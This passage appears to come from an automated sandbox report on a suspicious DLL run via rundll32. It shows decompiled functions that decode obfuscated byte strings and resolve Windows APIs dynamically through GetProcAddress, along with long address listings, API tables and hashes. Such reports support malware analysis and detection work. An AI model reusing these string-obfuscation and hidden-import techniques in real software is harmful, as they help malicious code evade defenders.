										_v165 = 0xc;
										_v164 = 0x10;
										_v163 = 0xc;
										_v162 = 0x19;
										_v161 = 0;
										_t251 = E6E771074( &_v176);
										_t176 = _t324 + 0x18; // 0x18
										_t252 = E6E77657F(_t176, _t251);
										_push(0);
										_push(_a8);
										_push(_v224);
										_push(_v80);
										if( *_t252() == 0) {
											_t254 = E6E77111C();
											_v216 = 0x52;
											_v215 = 0x38;
											_t325 = _t254;
											_v214 = 0x68;
											_v213 = 0x31;
											_v212 = 0x1d;
											_v211 = 0x34;
											_v210 = 0x69;
											_v209 = 0x54;
											_v208 = 0x51;
											_v207 = 0x54;
											_v206 = 0x4e;
											_v205 = 0x6e;
											_v204 = 0x35;
											_v203 = 0x26;
											_v202 = 0x4e;
											_v201 = 0x6e;
											_v200 = 0x14;
											_v199 = 0;
											_t256 = E6E772167( &_v216);
											_t205 = _t325 + 0x18; // 0x18
											_t257 = E6E77657F(_t205, _t256);
											_t258 =  *_t257(_v80, _v92, _v84, 0);
											_t322 = _t258;
											_t208 = E6E77111C() + 0x18; // 0x18
											E6E771E3C(_t208, _v84, _v80);
											_t317 = GetProcessHeap;
											_t261 = GetProcessHeap();
											_t292 = HeapFree;
											HeapFree(_t261, 0, _v96);
											if(_t258 == 0) {
												_t314 = _v232;
												 *_v228 = _v92;
												 *_v232 = _v84;
											} else {
												HeapFree(GetProcessHeap(), 0, _v92);
												goto L14;
											}
										} else {
											_t180 = E6E77111C() + 0x18; // 0x18
											E6E771E3C(_t180, _t319, _v80);
											_t317 = GetProcessHeap;
											_t270 = GetProcessHeap();
											_t322 = HeapFree;
											HeapFree(_t270, 0, _v92);
											_push(_v96);
											_push(0);
											goto L20;
										}
									} else {
										_t317 = GetProcessHeap;
										_t274 = GetProcessHeap();
										_t322 = HeapFree;
										HeapFree(_t274, 0, _v92);
										_push(_v96);
										_push(0);
										L20:
										HeapFree(GetProcessHeap(), ??, ??);
										goto L14;
									}
								} else {
									_push(_t322);
									_push(0);
									goto L13;
								}
							} else {
								_push(_t322);
								_push(0);
								L13:
								HeapFree(GetProcessHeap(), ??, ??);
								goto L14;
							}
						}
					}
				}
				return E6E778727(_t292, _v8 ^ _t326, _t314, _t317, _t322);
			}


































































































































































                                                      0x6e77268b
                                                      0x6e772694
                                                      0x6e77269b
                                                      0x6e7726a4
                                                      0x6e7726a6
                                                      0x6e7726af
                                                      0x6e7726b1
                                                      0x6e7726ba
                                                      0x6e7726c0
                                                      0x6e7726c9
                                                      0x6e7726cf
                                                      0x6e7726d3
                                                      0x6e7726d7
                                                      0x6e7726db
                                                      0x6e7726df
                                                      0x6e7726e3
                                                      0x6e7726e7
                                                      0x6e7726eb
                                                      0x6e7726ef
                                                      0x6e7726f3
                                                      0x6e7726f7
                                                      0x6e7726fb
                                                      0x6e7726ff
                                                      0x6e772703
                                                      0x6e772707
                                                      0x6e77270b
                                                      0x6e77270f
                                                      0x6e772713
                                                      0x6e772717
                                                      0x6e77271b
                                                      0x6e77271f
                                                      0x6e772723
                                                      0x6e772727
                                                      0x6e77272b
                                                      0x6e77272f
                                                      0x6e772733
                                                      0x6e77273a
                                                      0x6e77273f
                                                      0x6e772743
                                                      0x6e772745
                                                      0x6e772747
                                                      0x6e772754
                                                      0x6e772757
                                                      0x6e77275a
                                                      0x6e77275b
                                                      0x6e77275d
                                                      0x6e772761
                                                      0x6e772762
                                                      0x6e772767
                                                      0x6e772767
                                                      0x6e772773
                                                      0x6e772779
                                                      0x6e77277d
                                                      0x6e772785
                                                      0x6e772795
                                                      0x6e772795
                                                      0x6e77279f
                                                      0x00000000
                                                      0x6e7727a5
                                                      0x6e7727a9
                                                      0x6e7727b8
                                                      0x6e7727ba
                                                      0x6e7727bf
                                                      0x00000000
                                                      0x6e7727c5
                                                      0x6e7727c5
                                                      0x6e7727cc
                                                      0x6e7727d3
                                                      0x6e7727da
                                                      0x6e7727e1
                                                      0x6e7727e8
                                                      0x6e7727ef
                                                      0x6e7727f6
                                                      0x6e7727fd
                                                      0x6e772804
                                                      0x6e77280b
                                                      0x6e772812
                                                      0x6e772819
                                                      0x6e772820
                                                      0x6e772827
                                                      0x6e77282e
                                                      0x6e772835
                                                      0x6e77283c
                                                      0x6e772843
                                                      0x6e77284a
                                                      0x6e772851
                                                      0x6e772858
                                                      0x6e77285f
                                                      0x6e772866
                                                      0x6e77286d
                                                      0x6e772874
                                                      0x6e77287b
                                                      0x6e772882
                                                      0x6e772889
                                                      0x6e77288d
                                                      0x6e772891
                                                      0x6e772895
                                                      0x6e772899
                                                      0x6e77289d
                                                      0x6e7728a7
                                                      0x6e7728af
                                                      0x6e7728b3
                                                      0x6e7728b5
                                                      0x6e7728b6
                                                      0x6e7728c6
                                                      0x6e7728c9
                                                      0x6e7728cc
                                                      0x6e7728cd
                                                      0x6e7728cf
                                                      0x6e7728d6
                                                      0x6e7728d7
                                                      0x6e7728dc
                                                      0x6e7728e2
                                                      0x6e7728e2
                                                      0x6e7728f1
                                                      0x6e7728f7
                                                      0x6e7728fe
                                                      0x6e772911
                                                      0x6e77291b
                                                      0x6e77293f
                                                      0x6e772945
                                                      0x6e77294b
                                                      0x6e772950
                                                      0x6e772956
                                                      0x6e77295c
                                                      0x6e772962
                                                      0x6e772965
                                                      0x6e77296a
                                                      0x6e772977
                                                      0x6e77297e
                                                      0x6e772980
                                                      0x6e772987
                                                      0x6e77298e
                                                      0x6e772995
                                                      0x6e77299c
                                                      0x6e7729a3
                                                      0x6e7729aa
                                                      0x6e7729b1
                                                      0x6e7729b8
                                                      0x6e7729bf
                                                      0x6e7729c6
                                                      0x6e7729cd
                                                      0x6e7729d4
                                                      0x6e7729db
                                                      0x6e7729e2
                                                      0x6e7729ef
                                                      0x6e7729f6
                                                      0x6e7729fc
                                                      0x6e7729ff
                                                      0x6e772a06
                                                      0x6e772a07
                                                      0x6e772a08
                                                      0x6e772a09
                                                      0x6e772a0a
                                                      0x6e772a10
                                                      0x6e772a11
                                                      0x6e772a16
                                                      0x6e772a3d
                                                      0x6e772a40
                                                      0x6e772a45
                                                      0x6e772a52
                                                      0x6e772a59
                                                      0x6e772a5b
                                                      0x6e772a62
                                                      0x6e772a64
                                                      0x6e772a6b
                                                      0x6e772a72
                                                      0x6e772a79
                                                      0x6e772a80
                                                      0x6e772a87
                                                      0x6e772a8e
                                                      0x6e772a95
                                                      0x6e772a9c
                                                      0x6e772aa3
                                                      0x6e772aaa
                                                      0x6e772ab1
                                                      0x6e772abe
                                                      0x6e772ac4
                                                      0x6e772aca
                                                      0x6e772acd
                                                      0x6e772ad2
                                                      0x6e772ad3
                                                      0x6e772ad6
                                                      0x6e772adc
                                                      0x6e772ae1
                                                      0x6e772b17
                                                      0x6e772b1c
                                                      0x6e772b29
                                                      0x6e772b30
                                                      0x6e772b32
                                                      0x6e772b39
                                                      0x6e772b40
                                                      0x6e772b47
                                                      0x6e772b4e
                                                      0x6e772b55
                                                      0x6e772b5c
                                                      0x6e772b63
                                                      0x6e772b6a
                                                      0x6e772b71
                                                      0x6e772b78
                                                      0x6e772b7f
                                                      0x6e772b86
                                                      0x6e772b8d
                                                      0x6e772b94
                                                      0x6e772ba1
                                                      0x6e772ba8
                                                      0x6e772bae
                                                      0x6e772bb1
                                                      0x6e772bbd
                                                      0x6e772bc2
                                                      0x6e772bc9
                                                      0x6e772bcc
                                                      0x6e772bd4
                                                      0x6e772bdc
                                                      0x6e772bde
                                                      0x6e772be5
                                                      0x6e772be9
                                                      0x6e772c03
                                                      0x6e772c09
                                                      0x6e772c11
                                                      0x6e772beb
                                                      0x6e772bf3
                                                      0x00000000
                                                      0x6e772bf3
                                                      0x6e772ae3
                                                      0x6e772aeb
                                                      0x6e772aee
                                                      0x6e772af6
                                                      0x6e772afd
                                                      0x6e772aff
                                                      0x6e772b06
                                                      0x6e772b08
                                                      0x6e772b0b
                                                      0x00000000
                                                      0x6e772b0b
                                                      0x6e772a18
                                                      0x6e772a1b
                                                      0x6e772a23
                                                      0x6e772a25
                                                      0x6e772a2c
                                                      0x6e772a2e
                                                      0x6e772a31
                                                      0x6e772a33
                                                      0x6e772a36
                                                      0x00000000
                                                      0x6e772a36
                                                      0x6e772952
                                                      0x6e772952
                                                      0x6e772953
                                                      0x00000000
                                                      0x6e772953
                                                      0x6e77291d
                                                      0x6e77291d
                                                      0x6e77291e
                                                      0x6e772920
                                                      0x6e772923
                                                      0x00000000
                                                      0x6e772923
                                                      0x6e77291b
                                                      0x6e7727bf
                                                      0x6e77279f
                                                      0x6e772939

                                                      APIs
                                                      • lstrcpyW.KERNEL32(?,00000034), ref: 6E772773
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E7727AF
                                                      • HeapAlloc.KERNEL32(00000000), ref: 6E7727B2
                                                      • lstrcpyW.KERNEL32(?,0000005A), ref: 6E7728F1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E772920
                                                      • HeapFree.KERNEL32(00000000), ref: 6E772923
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E772942
                                                      • HeapAlloc.KERNEL32(00000000), ref: 6E772945
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E772A23
                                                      • HeapFree.KERNEL32(00000000), ref: 6E772A2C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E772A33
                                                      • HeapFree.KERNEL32(00000000), ref: 6E772A36
                                                        • Part of subcall function 6E77657F: GetProcAddress.KERNEL32(0000000C,00000000,0000000C,?,6E777BB1,00000000), ref: 6E77658E
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E772AFD
                                                      • HeapFree.KERNEL32(00000000), ref: 6E772B06
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E772BDC
                                                      • HeapFree.KERNEL32(00000000), ref: 6E772BE5
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 6E772BF0
                                                      • HeapFree.KERNEL32(00000000), ref: 6E772BF3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$Alloclstrcpy$AddressProc
                                                      • String ID: %$%$&$'$'$'$'$-$.$1$1$4$4$5$8$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$<$I$J$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$O$Q$R$R$T$T$W$W$W$W$Z$Z$[$_$_$_$`$h$i$j$k$n$n$n$t$t$u$u$u$u$x$y$|$~
                                                      • API String ID: 949177242-1787682399
                                                      • Opcode ID: 392f132dad7e2a79ad07d2cd2be41933bd0644f95bc19adf15d08e3123295b44
                                                      • Instruction ID: a45bc412110a3150cb1a77e94dd8caae28ba4605ebbe5ba0c62bf3a42a95babe
                                                      • Opcode Fuzzy Hash: 392f132dad7e2a79ad07d2cd2be41933bd0644f95bc19adf15d08e3123295b44
                                                      • Instruction Fuzzy Hash: 380214609082D8DDEF22C7B8CD58BDEBFB45F26308F1440D9D1986B252C7B95A49DF22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7759F0, Relevance: 112.2, APIs: 7, Strings: 57, Instructions: 227libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E6E7759F0(void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t179;
				_Unknown_base(*)()* _t209;
				void* _t214;
				_Unknown_base(*)()* _t216;
				char _t217;
				signed int _t225;
				void* _t227;
				_Unknown_base(*)()* _t228;
				void* _t230;

				_t227 = __esi;
				_v52 = 0x24;
				_v51 = 0x16;
				_v50 = 0xf;
				_v49 = 0x42;
				_v48 = 0x16;
				_v47 = 0x1c;
				_v46 = 0x58;
				_v45 = 0x45;
				_v44 = 0x78;
				_v43 = 3;
				_v42 = 0x1c;
				_v41 = 0x1c;
				_v40 = 8;
				_t209 = 0;
				_v39 = 0;
				_t169 = GetModuleHandleA(E6E7710E2( &_v52));
				 *0x6e78d3cc = _t169;
				if(_t169 == 0) {
					 *0x6e78d3d4 = 0;
					 *0x6e78d3c4 = 0;
					 *0x6e78d3c0 = 0;
					 *0x6e78d3d0 = 0;
				} else {
					_v84 = 0x52;
					_v83 = 0x20;
					_v82 = 7;
					_v81 = 0x43;
					_v80 = 0x5f;
					_v79 = 0x64;
					_v78 = 0x78;
					_v77 = 0x5c;
					_v76 = 0x4c;
					_v75 = 0x4c;
					_v74 = 0x5f;
					_v73 = 0x20;
					_v72 = 0x33;
					_v71 = 0x33;
					_v70 = 0x1f;
					_v69 = 0;
					 *0x6e78d3d4 = GetProcAddress( *0x6e78d3cc, E6E775D06( &_v84));
					_v68 = 0x49;
					_v67 = 0xd;
					_v66 = 0x25;
					_v65 = 0x32;
					_v64 = 0x49;
					_v63 = 0x72;
					_v62 = 0x7e;
					_v61 = 0x1a;
					_v60 = 0x25;
					_v59 = 0x1a;
					_v58 = 0xe;
					_v57 = 0x24;
					_v56 = 0x28;
					_v55 = 0;
					GetProcAddress( *0x6e78d3cc, E6E7710AE( &_v68));
					_v36 = 0x6a;
					_v35 = 0x6f;
					_v34 = 0x6d;
					_v33 = 0x37;
					_v32 = 0x6a;
					_v31 = 0x5c;
					_v30 = 0x5b;
					_v29 = 0x39;
					_v28 = 0x6d;
					_v27 = 0x39;
					_v26 = 0x3a;
					_v25 = 0x32;
					_v24 = 0x4d;
					_v23 = 0;
					_t225 = 0x7f;
					if(_v23 == 0) {
						_t217 = 0;
						do {
							_t68 = _t217 - 0x20; // 0x6a
							asm("cdq");
							asm("cdq");
							 *((char*)(_t230 + _t217 - 0x20)) = (_t225 + (( *(_t230 + _t68) & 0x000000ff) - 0x4d) * 7 % _t225) % _t225;
							_t217 = _t217 + 1;
						} while (_t217 < 0xd);
						_v23 = 1;
					}
					_t81 =  &_v36; // 0x6a
					_t179 = GetProcAddress( *0x6e78d3cc, _t81);
					 *0x6e78d3c4 = _t179;
					 *0x6e78d3c0 = _t179;
					_v20 = 0x4b;
					_v19 = 0x18;
					_v18 = 0x75;
					_v17 = 0x75;
					_v16 = 0x78;
					_v15 = 0x14;
					_v14 = 0x1f;
					_v13 = 0x18;
					_v12 = 0x57;
					_v11 = 0x18;
					_v10 = 0xd;
					_v9 = 0x3a;
					_v8 = _t209;
					if(_v8 == _t209) {
						_t216 = _t209;
						do {
							asm("cdq");
							asm("cdq");
							 *(_t230 + _t216 - 0x10) = (_t225 + (( *(_t230 + _t216 - 0x10) & 0x000000ff) - 0x3a) * 0x22 % _t225) % _t225;
							_t216 = _t216 + 1;
						} while (_t216 < 0xc);
						_v8 = 1;
					}
					 *0x6e78d3d0 = GetProcAddress( *0x6e78d3cc,  &_v20);
					_v104 = 0x3c;
					_v103 = 0x49;
					_v102 = 0x10;
					_v101 = 0x58;
					_v100 = 0x23;
					_v99 = 0x1a;
					_v98 = 0x3f;
					_v97 = 0x15;
					_v96 = 0x49;
					_v95 = 0x6b;
					_v94 = 0xc;
					_v93 = 0x73;
					_v92 = 0x1a;
					_v91 = 0x15;
					_v90 = 0x49;
					_v89 = 0x32;
					_v88 = 0x19;
					_v87 = _t209;
					if(_v87 == _t209) {
						_push(_t227);
						_t228 = _t209;
						do {
							_t214 = 0x19;
							asm("cdq");
							asm("cdq");
							 *(_t230 + _t228 - 0x64) = (_t225 + (_t214 - ( *(_t230 + _t228 - 0x64) & 0x000000ff)) * 0x1b % _t225) % _t225;
							_t228 = _t228 + 1;
						} while (_t228 < 0x11);
						_v87 = 1;
					}
					GetProcAddress( *0x6e78d3cc,  &_v104);
					_v124 = 0x4f;
					_v123 = 0x3d;
					_v122 = 0x34;
					_v121 = 0x32;
					_v120 = 0x37;
					_v119 = 0x57;
					_v118 = 0x1a;
					_v117 = 6;
					_v116 = 0x3d;
					_v115 = 0x35;
					_v114 = 0x26;
					_v113 = 0x51;
					_v112 = 0x57;
					_v111 = 6;
					_v110 = 0x3d;
					_v109 = 0x6c;
					_v108 = 0x14;
					_v107 = _t209;
					_t209 = GetProcAddress( *0x6e78d3cc, E6E772167( &_v124));
				}
				 *0x6e78d3c8 = _t209;
				return 0x6e78d614;
			}
























































































































                                                      0x6e7759f0
                                                      0x6e7759f6
                                                      0x6e7759fd
                                                      0x6e775a01
                                                      0x6e775a05
                                                      0x6e775a09
                                                      0x6e775a0d
                                                      0x6e775a11
                                                      0x6e775a15
                                                      0x6e775a19
                                                      0x6e775a1d
                                                      0x6e775a21
                                                      0x6e775a25
                                                      0x6e775a2a
                                                      0x6e775a2e
                                                      0x6e775a33
                                                      0x6e775a3c
                                                      0x6e775a42
                                                      0x6e775a49
                                                      0x6e775ce0
                                                      0x6e775ce6
                                                      0x6e775cec
                                                      0x6e775cf2
                                                      0x6e775a4f
                                                      0x6e775a4f
                                                      0x6e775a56
                                                      0x6e775a5a
                                                      0x6e775a5e
                                                      0x6e775a62
                                                      0x6e775a66
                                                      0x6e775a6a
                                                      0x6e775a6e
                                                      0x6e775a72
                                                      0x6e775a76
                                                      0x6e775a7a
                                                      0x6e775a7e
                                                      0x6e775a82
                                                      0x6e775a86
                                                      0x6e775a8a
                                                      0x6e775a92
                                                      0x6e775aa7
                                                      0x6e775aaf
                                                      0x6e775ab3
                                                      0x6e775ab7
                                                      0x6e775abb
                                                      0x6e775abf
                                                      0x6e775ac3
                                                      0x6e775ac7
                                                      0x6e775acb
                                                      0x6e775acf
                                                      0x6e775ad3
                                                      0x6e775ad7
                                                      0x6e775adb
                                                      0x6e775adf
                                                      0x6e775ae6
                                                      0x6e775af5
                                                      0x6e775afb
                                                      0x6e775aff
                                                      0x6e775b03
                                                      0x6e775b07
                                                      0x6e775b0b
                                                      0x6e775b0f
                                                      0x6e775b13
                                                      0x6e775b17
                                                      0x6e775b1b
                                                      0x6e775b1f
                                                      0x6e775b23
                                                      0x6e775b27
                                                      0x6e775b2b
                                                      0x6e775b32
                                                      0x6e775b37
                                                      0x6e775b3b
                                                      0x6e775b3d
                                                      0x6e775b3f
                                                      0x6e775b3f
                                                      0x6e775b4c
                                                      0x6e775b52
                                                      0x6e775b55
                                                      0x6e775b59
                                                      0x6e775b5a
                                                      0x6e775b5f
                                                      0x6e775b5f
                                                      0x6e775b63
                                                      0x6e775b6d
                                                      0x6e775b73
                                                      0x6e775b78
                                                      0x6e775b7d
                                                      0x6e775b81
                                                      0x6e775b85
                                                      0x6e775b89
                                                      0x6e775b8d
                                                      0x6e775b91
                                                      0x6e775b95
                                                      0x6e775b99
                                                      0x6e775b9d
                                                      0x6e775ba1
                                                      0x6e775ba5
                                                      0x6e775ba9
                                                      0x6e775bb0
                                                      0x6e775bb6
                                                      0x6e775bb8
                                                      0x6e775bba
                                                      0x6e775bc7
                                                      0x6e775bcd
                                                      0x6e775bd0
                                                      0x6e775bd4
                                                      0x6e775bd5
                                                      0x6e775bda
                                                      0x6e775bda
                                                      0x6e775bee
                                                      0x6e775bf3
                                                      0x6e775bf7
                                                      0x6e775bfb
                                                      0x6e775bff
                                                      0x6e775c03
                                                      0x6e775c07
                                                      0x6e775c0b
                                                      0x6e775c0f
                                                      0x6e775c13
                                                      0x6e775c17
                                                      0x6e775c1b
                                                      0x6e775c1f
                                                      0x6e775c23
                                                      0x6e775c27
                                                      0x6e775c2b
                                                      0x6e775c2f
                                                      0x6e775c33
                                                      0x6e775c3a
                                                      0x6e775c40
                                                      0x6e775c42
                                                      0x6e775c43
                                                      0x6e775c45
                                                      0x6e775c4e
                                                      0x6e775c54
                                                      0x6e775c5a
                                                      0x6e775c5d
                                                      0x6e775c61
                                                      0x6e775c62
                                                      0x6e775c67
                                                      0x6e775c6b
                                                      0x6e775c76
                                                      0x6e775c7c
                                                      0x6e775c83
                                                      0x6e775c87
                                                      0x6e775c8b
                                                      0x6e775c8f
                                                      0x6e775c93
                                                      0x6e775c97
                                                      0x6e775c9b
                                                      0x6e775c9f
                                                      0x6e775ca3
                                                      0x6e775ca7
                                                      0x6e775cab
                                                      0x6e775caf
                                                      0x6e775cb3
                                                      0x6e775cb7
                                                      0x6e775cbb
                                                      0x6e775cbf
                                                      0x6e775cc6
                                                      0x6e775cdb
                                                      0x6e775cdd
                                                      0x6e775cf8
                                                      0x6e775d05

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 6E775A3C
                                                      • GetProcAddress.KERNEL32(00000000,6E78D614), ref: 6E775AA1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 6E775AF5
                                                      • GetProcAddress.KERNEL32(jom7j\[9m9:2M), ref: 6E775B6D
                                                      • GetProcAddress.KERNEL32(0000004B), ref: 6E775BE8
                                                      • GetProcAddress.KERNEL32(0000003C), ref: 6E775C76
                                                      • GetProcAddress.KERNEL32(00000000), ref: 6E775CD5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: $ $#$$$$$%$%$&$($2$2$2$3$3$4$5$7$:$<$=$=$=$?$B$C$E$I$I$I$I$I$K$L$L$O$Q$R$W$W$W$X$X$\$_$_$d$jom7j\[9m9:2M$k$l$r$s$u$u$x$x$x$~
                                                      • API String ID: 667068680-2499133863
                                                      • Opcode ID: dfe223c3ead3bc7a77a26d15eec5ab84e80368768ff2f16e3a9e0df57432c61d
                                                      • Instruction ID: 7088c28a0e9844d0893a1aa5e112fc56df0cd8e1ea8f63da13829d68190a38ce
                                                      • Opcode Fuzzy Hash: dfe223c3ead3bc7a77a26d15eec5ab84e80368768ff2f16e3a9e0df57432c61d
                                                      • Instruction Fuzzy Hash: 69C107208093C8DDEF12C7E895587DEBFF95B27308F5840ADD5846B292C7BA0609DB76
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E774059, Relevance: 87.4, APIs: 15, Strings: 43, Instructions: 380memorystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E6E774059(intOrPtr* __ecx) {
				signed int _v8;
				char _v12;
				char _v16;
				long _v20;
				char _v24;
				signed int _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				signed int _v48;
				char _v50;
				char _v51;
				char _v52;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				void* _v124;
				intOrPtr* _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t194;
				void* _t198;
				void* _t204;
				signed int _t208;
				void* _t220;
				signed int _t228;
				long _t234;
				void* _t235;
				CHAR* _t244;
				void* _t247;
				signed int _t266;
				signed int _t273;
				signed int _t279;
				signed int _t281;
				void* _t282;
				void* _t283;
				signed int _t284;
				char _t290;
				void* _t292;
				void* _t293;
				void* _t294;
				intOrPtr _t298;
				intOrPtr _t301;
				void* _t305;
				void* _t308;
				void* _t310;
				intOrPtr* _t316;
				CHAR* _t319;
				char _t320;
				signed int _t321;
				void* _t322;
				signed int _t323;
				void* _t324;
				void* _t325;
				void* _t326;

				_t194 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t194 ^ _t323;
				_t316 = __ecx;
				_v128 = __ecx;
				_v84 = 0x49;
				_v83 = 0x68;
				_v82 = 0x62;
				_v81 = 0x78;
				_v80 = 0x55;
				_v79 = 0x68;
				_v78 = 0x16;
				_v77 = 0x42;
				_v76 = 0x42;
				_v75 = 0x62;
				_v74 = 0x6f;
				_v73 = 0x68;
				_v72 = 0xf;
				_v71 = 0x55;
				_v70 = 0x75;
				_v69 = 0x16;
				_v68 = 0x6f;
				_v67 = 0x35;
				_v66 = 0x78;
				_v65 = 0x55;
				_v64 = 0xf;
				_v63 = 0x3c;
				_v62 = 8;
				_v61 = 0;
				_t281 = 0x7f;
				if(_v61 != 0) {
					L4:
					_t325 = _t324 - 0x18;
					_push( &_v84);
					_push( *_t316);
					_t198 = E6E77111C();
					_t317 = 4;
					_t282 = E6E772F23(_t317 + _t198, _t317);
					_v32 = _t282;
					if(_t282 == 0) {
						L23:
						L24:
						return E6E778727(_t282, _v8 ^ _t323, _t312, _t317, _t318);
					}
					_v60 = 0x54;
					_v59 = 0xb;
					_v58 = 0x54;
					_v57 = 0x4d;
					_t290 = 0;
					_v56 = 0;
					_v120 = 0x20;
					_v119 = 0x3f;
					_v118 = 0xc;
					_v117 = 0xd;
					_v116 = 0x72;
					_v115 = 0x66;
					_v114 = 0x20;
					_v113 = 0x3b;
					_v112 = 0x7e;
					_v111 = 0x25;
					_v110 = 0x1a;
					_v109 = 0xc;
					_v108 = 0x78;
					_v107 = 0x72;
					_v106 = 0x66;
					_v105 = 1;
					_v104 = 8;
					_v103 = 0x60;
					_v102 = 0x78;
					_v101 = 0x5a;
					_v100 = 0;
					_v99 = 8;
					_v98 = 0x25;
					_v97 = 0;
					_v96 = 0;
					_v95 = 0x78;
					_v94 = 0x1a;
					_v93 = 0xc;
					_v92 = 0x73;
					_v91 = 8;
					_v90 = 0x47;
					_v89 = 0x28;
					_v88 = 0;
					if(_v88 != 0) {
						L9:
						_v44 = 0x52;
						_v43 = 0x2b;
						_v42 = 0x12;
						_v41 = 0x1f;
						_v40 = _t290;
						if(_v40 != 0) {
							L13:
							_t326 = _t325 - 0x10;
							_t204 = E6E773D39( &_v60);
							_t292 = _t317 + E6E77111C();
							_t208 = E6E773DA7(_t292, _t317, _t282,  &_v44,  &_v120, _t204);
							_t318 = _t208;
							if(_t208 != 0) {
								_push(_t292);
								_push(_t292);
								_t282 = 0;
								_t293 = _t317 + E6E77111C();
								if(E6E773E54(_t293, _t318, _t318, 0, 0) == 0) {
									goto L23;
								}
								_push(_t293);
								_v16 = 0;
								_v20 = 0;
								_t294 = _t317 + E6E77111C();
								E6E773EFC(_t294, _t317, _t318, 0x20000005,  &_v20,  &_v16);
								_t282 = GetProcessHeap;
								_t317 = HeapAlloc(GetProcessHeap(), 0, _v20);
								_v124 = _t317;
								if(_t317 == 0) {
									L21:
									_t140 = E6E77111C() + 4; // 0x4
									E6E778517(_t140, _t317, _t318);
									_push(_v32);
									_t220 = E6E77111C() + 4;
									L22:
									E6E778517(_t220, _t317);
									goto L23;
								}
								_v12 = 0;
								if(_v20 <= 0) {
									_v36 = 0;
									_v24 = 0;
									while(1) {
										_push(_t294);
										_push(_t294);
										_t146 = E6E77111C() + 4; // 0x4
